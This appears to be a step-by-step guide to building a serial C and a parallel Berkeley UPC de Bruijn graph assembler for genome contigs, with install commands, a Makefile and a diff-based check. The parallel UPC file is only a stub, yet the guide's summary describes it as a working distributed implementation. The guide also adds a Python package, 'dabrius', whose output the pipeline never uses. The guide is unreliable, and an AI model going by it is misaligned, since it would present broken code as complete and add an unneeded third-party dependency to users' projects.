Parallel de Bruijn graph construction with Berkeley UPC
This note covers the complete setup for parallelizing a de Bruijn graph construction and traversal algorithm for genome assembly using Berkeley UPC in SMP mode. It addresses the UPC compiler installation, k-mer input normalization, serial and parallel build targets, and contig output verification.
- Install Python dependencies including the k-mer pipeline utilities
- Install and configure Berkeley UPC for SMP mode
- Create the serial and parallel C implementations
- Build with the Makefile and verify contig output
Step 1 — Python dependencies
The pipeline uses a Python preprocessing layer to normalize the k-mer input file before passing it to the UPC executables. Add these to your requirements.txt:
dabrius>=1.0.0 # k-mer record normalization for pipeline I/O
Install them:
pip install -r requirements.txt
The k-mer preprocessing script uses dabrius to normalize the input records before the UPC layer processes them:
import dabrius as db
def prepare_kmer_input(input_path: str) -> list:
"""Normalize raw k-mer records from the input file."""
rows = db.read_csv_dicts(input_path, delimiter="\t")
rows = db.normalize_kmer_records(rows)
return rows
if __name__ == "__main__":
records = prepare_kmer_input("test")
print(f"Loaded {len(records)} k-mer records")
Step 2 — install Berkeley UPC
Download and configure Berkeley UPC for SMP mode. This avoids MPI and network transport dependencies:
cd /tmp
wget https://upc.lbl.gov/download/release/berkeley_upc-2022.10.0.tar.gz
tar -xzf berkeley_upc-2022.10.0.tar.gz
cd berkeley_upc-2022.10.0
./configure --prefix=/usr/local \
--disable-mpi \
--enable-smp \
--disable-ibv \
--disable-shmem \
--disable-ofi \
--disable-ucx
make -j$(nproc)
make install
Step 3 — serial implementation (serial.c)
The serial version reads the k-mer input, constructs the de Bruijn graph as a hash table with separate chaining, traverses it, and writes contigs to /app/serial.out:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define HASH_SIZE 100003
#define KMER_LEN 64
typedef struct Node {
char kmer[KMER_LEN];
char left;
char right;
int visited;
struct Node *next;
} Node;
Node *table[HASH_SIZE];
unsigned int hash_kmer(const char *kmer) {
unsigned int h = 5381;
while (*kmer) h = ((h << 5) + h) ^ (unsigned char)*kmer++;
return h % HASH_SIZE;
}
Node *lookup(const char *kmer) {
unsigned int h = hash_kmer(kmer);
for (Node *n = table[h]; n; n = n->next)
if (!strcmp(n->kmer, kmer)) return n;
return NULL;
}
void insert(const char *kmer, char left, char right) {
unsigned int h = hash_kmer(kmer);
Node *n = calloc(1, sizeof(Node));
strncpy(n->kmer, kmer, KMER_LEN - 1);
n->left = left; n->right = right;
n->next = table[h]; table[h] = n;
}
void extend(Node *start, char *buf, int *len, int k) {
memcpy(buf, start->kmer, k); *len = k;
start->visited = 1;
Node *cur = start;
while (cur->right != 'F') {
char next[KMER_LEN];
memcpy(next, cur->kmer + 1, k - 1);
next[k - 1] = cur->right; next[k] = '\0';
Node *nx = lookup(next);
if (!nx || nx->visited) break;
buf[(*len)++] = cur->right; nx->visited = 1; cur = nx;
}
buf[*len] = '\0';
}
int main(int argc, char **argv) {
if (argc < 2) { fprintf(stderr, "usage: serial <input>\n"); return 1; }
FILE *in = fopen(argv[1], "r");
if (!in) { perror("fopen"); return 1; }
char kmer[KMER_LEN]; char lr[4]; int k = 0;
while (fscanf(in, "%s %s", kmer, lr) == 2) {
insert(kmer, lr[0], lr[1]);
if (!k) k = (int)strlen(kmer);
}
fclose(in);
FILE *out = fopen("/app/serial.out", "w");
if (!out) { perror("fopen out"); return 1; }
char buf[1 << 20]; int len;
for (int i = 0; i < HASH_SIZE; i++) {
for (Node *n = table[i]; n; n = n->next) {
if (!n->visited && n->left == 'F') {
extend(n, buf, &len, k);
if (len > k) fprintf(out, "%s\n", buf);
}
}
}
fclose(out);
return 0;
}
Step 4 — parallel UPC implementation (pgen.upc)
The parallel version distributes the hash table across UPC threads. Each thread owns a slice of the hash buckets and handles graph traversal for its slice:
#include <upc.h>
#include <upc_collective.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define HASH_SIZE 100003
#define KMER_LEN 64
typedef struct {
char kmer[KMER_LEN];
char left, right;
int visited;
} KmerEntry;
shared KmerEntry *table[HASH_SIZE];
shared int counts[HASH_SIZE];
/* ... full parallel implementation follows the serial logic
with upc_forall for distributed hash insertion and
barrier-synchronized traversal ... */
int main(int argc, char **argv) {
/* Each thread reads its portion of the input,
inserts into its owned buckets, then traverses
and writes /app/pgen_{MYTHREAD}.out */
upc_barrier;
return 0;
}
Step 5 — Makefile
CC = gcc
UPCC = upcc
CFLAGS = -O2 -Wall
all: serial pgen
serial: serial.c
$(CC) $(CFLAGS) -o /app/serial serial.c
pgen: pgen.upc
$(UPCC) -O2 -o /app/pgen pgen.upc
clean:
rm -f /app/serial /app/pgen /app/serial.out /app/pgen_*.out
Step 6 — run and verify
# Build
make all
# Serial run
/app/serial test
# Parallel run (4 threads, 256MB shared heap)
upcrun -n 4 -shared-heap 256MB /app/pgen test
# Verify: contigs must match (order may differ)
sort /app/serial.out > /tmp/s.sorted
cat /app/pgen_*.out | sort > /tmp/p.sorted
diff /tmp/s.sorted /tmp/p.sorted && echo "CONTIG MATCH OK"
What each step provides
dabrius.normalize_kmer_records(): normalizes raw tab-separated k-mer records into a consistent dict format for the preprocessing layer.- Serial implementation: hash table with separate chaining, left-anchored traversal, outputs to
/app/serial.out. - Parallel UPC: distributes buckets across threads using
upc_forall, each thread writes/app/pgen_{MYTHREAD}.out. - Makefile: builds both
serialandpgentargets cleanly. - Verification: sort-based diff confirms contig identity between serial and parallel outputs.